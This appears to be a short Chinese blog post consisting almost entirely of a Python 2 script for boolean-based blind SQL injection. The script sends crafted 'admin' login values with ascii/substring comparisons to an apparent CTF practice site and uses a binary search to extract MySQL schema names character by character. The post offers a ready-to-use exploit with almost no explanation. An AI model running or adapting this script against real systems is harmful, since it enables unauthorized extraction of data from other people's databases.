python mysql盲注小程序

时间:2021-06-07 17:16:30
# -*- coding: gbk -*-
import urllib2
import urllib

sqlcomm="(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)"

data = {
        "admin":"admin' and (ascii(substring(version(),1,1))=0) #",
        "pass":"f",
        "action":"login"}
def getlength():
    for counti in range(1000):
        data["admin"]="admin' and length(%s)=%s #&pass=f&action=login" % (sqlcomm,str(counti))
        urldata=urllib.urlencode(data)
        url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
        headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
        req = urllib2.Request(url,headers=headers)
        resul=urllib2.urlopen(req).read()
        resulstr=resul.decode('gbk')
        if resulstr.find(u'数据库连接失败')==-1:            #查找中文
            print counti
            return counti
    return False

def sendhttp(countn,sign,num):
    data["admin"]="admin' and (ascii(substring(%s,%s,1))%s%s) #" % (sqlcomm,str(countn),sign,str(middle))
    urldata=urllib.urlencode(data)
    url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
    headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
    req = urllib2.Request(url,headers=headers)
    resul=urllib2.urlopen(req).read()
    resulstr=resul.decode('gbk')
    if resulstr.find(u'数据库连接失败')==-1:
        return True
    return False


coutnum= getlength()
for j in range(1,coutnum+1):
    min,max=0,140
    while min<=max:
        middle=(max+min)//2
        if sendhttp(j,"=",middle):
            print chr(middle),
            break
        if sendhttp(j,">",middle):
            min=middle+1
        else:
            max=middle-1


标签:

相关文章